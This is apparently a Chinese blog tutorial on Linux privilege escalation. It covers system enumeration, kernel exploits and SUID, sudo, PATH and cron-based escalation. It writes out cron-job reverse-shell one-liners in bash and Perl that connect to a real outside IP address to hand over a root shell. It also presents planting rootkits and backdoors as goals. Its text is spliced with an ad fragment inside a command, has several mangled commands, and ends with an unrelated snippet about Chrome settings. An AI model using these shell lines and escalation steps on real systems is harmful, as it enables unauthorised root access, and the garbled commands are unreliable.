这篇文章主要讲解了“linux提权指的是什么”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“linux提权指的是什么”吧! 提权指的是低权限用户利用各种合法的或非法的手段获取到了高于本用户的系统权限;Linux提权一般是指获取root用户权限的操作过程。Linux提权的本质一方面是信息收集,另一方面是对内核漏洞的掌握情况;提权是否成功的关键是信息收集是否完整。提权是什么提权指的是低权限用户利用各种合法的或非法的手段获取到了高于本用户的系统权限。详细来说,就是指利用操作系统或应用软件中的程序漏洞、设计缺陷或配置疏忽来获取对应用程序或用户来说受保护资源的高级访问权限。其结果是,应用程序可以获取比应用程序开发者或系统管理员预期的更高的特权,从而可以执行授权的动作。Linux提权一般是指获取root用户权限的操作过程。Linux提权目的提权操作有风险为什么还要进行提权?什么情况下需要进行提权?获取高权限之后可以做什么?通过命令执行漏洞获取的一个反弹shell或是通过Web漏洞获取了一个Webshell后,一般情况下权限都较低。在执行一些重要敏感的操作或是对重要的文件进行修改时无法正常进行,便需要进行提权。Linux中安装的数据库、中间件等一般都不是以root用户启动的,通过数据库或是中间件获取到的权限是是低权限的。获取一个root权限是每一个黑客的梦想。读取写入服务器中的重要文件:修改root密码替换系统命令在系统中放置更为隐蔽的后门:ping后门Rootkit保证服务器重启之后权限仍在:内存后门Linux提权本质Linux提权的本质一方面是信息收集,另一方面是对内核漏洞的掌握情况。Linux信息收集任何提权的第一步操作一定是对操作系统进行信息收集。提权是否成功的关键是信息收集是否完整。内核设备信息:uname -a 打印所有可用的系统信息uname -r 内核版本uname -n 系统主机名。uname -m 查看系统内核架构(64位/32位)hostname 系统主机名cat /pr免费云主机、域名oc/version 内核信息cat /etc/*-release 分发信息cat /etc/issue 分发信息cat /proc/cpuinfo CPU信息用户和群组信息:cat /etc/passwd 列出系统上的所有用户cat /etc/group 列出系统上的所有组grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’ 列出所有的超级用户账户whoami 查看当前用户w 谁目前已登录,他们正在做什么last 最后登录用户的列表lastlog 所有用户上次登录的信息lastlog -u %username% 有关指定用户上次登录的信息lastlog |grep -v “Never” 以前登录用户的信息用户和权限信息:whoami 当前用户名id 当前用户信息cat /etc/sudoers 谁被允许以root身份执行sudo -l 当前用户可以以root身份执行操作环境系统变量信息:env 显示环境变量set 现实环境变量echo %PATH 路径信息history 显示当前用户的历史命令记录pwd 输出工作目录cat /etc/profile 显示默认系统变量cat /etc/shells 显示可用的shell内核漏洞提权指的是普通用户访问操作系统内核,利用内核漏洞将权限提高为root权限,一般首先需要知晓操作系统的内核,内核的版本等信息,再寻找内核漏洞的EXP进行提权
linux常用查看系统信息命令 uname-a查看系统全部信息 uname-r查看内核版本 cat/proc/version查看内核信息 cat/etc/*-realease查看CentOS版本 cat/etc/issue查看Ubuntu版本 cat/etc/redhat-release查看RedHat版本 env查看环境变量 echo$PATH查看当前环境变量 awk-F:'($3==0){print$1}'/etc/passwd查找UID为0的用户 find/-userroot-perm-4000-execls-ldb{};查找设置了SUID的文件
例子:1)查看系统的内核版本2)使用kali的searchsploit寻找对应的内核漏洞或网上寻找相应的内核漏洞3)使用gcc将C语言程序编译成可执行文件,上传至靶机,执行即可提权至root权限1、计划任务提权利用原理:当 /bin/sh指向/bin/dash的时候(ubuntu默认这样,当前的靶机也是这样),反弹shell用bash的话得这样弹: * * * * * root bash -c “bash -i >&/dev/tcp/106.13.124.93/2333 0>&1”
这样弹shell的时候不知道为什么很慢,耐心等等*/1 * * * * root perl -e ‘use Socket;(i=”106.13.124.93″;)p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in((p,inet_aton()i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’2、利用SUID提权SUID概念:SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通用户,来验证与其他主机的连通性。SUID提权:什么是suid提权呢?一个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,那么我们就能从普通用户提升到了root权限了。在本地查找符合条件的文件。find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;常见的可以提权的程序nmap vim find Bash More Less Nano cp netcat3、利用SUDO提权Linux系统中可以使用sudo执行一个只有root才能执行的命令,配置文件保存在/etc/sudoers,sudo -l可以列出当前用户支持sudo的命令。尽量从代码层面进行对漏洞的分析。4、环境变量提权查看当前环境变量:echo $PATH5、root权限运行的服务以root的运行的服务,其中包括第三方软件都可以进行提权。感谢各位的阅读,以上就是“linux提权指的是什么”的内容了,经过本文的学习后,相信大家对linux提权指的是什么这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是云技术,小编将为大家推送更多相关知识点的文章,欢迎关注!
这篇文章主要介绍“windows谷歌浏览器英文版怎么设置中文”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“windows谷歌浏览器英文版怎么设置中文”文章能帮助大家解决问题。 1、首先打开电脑,在桌面上找到谷歌英文版浏…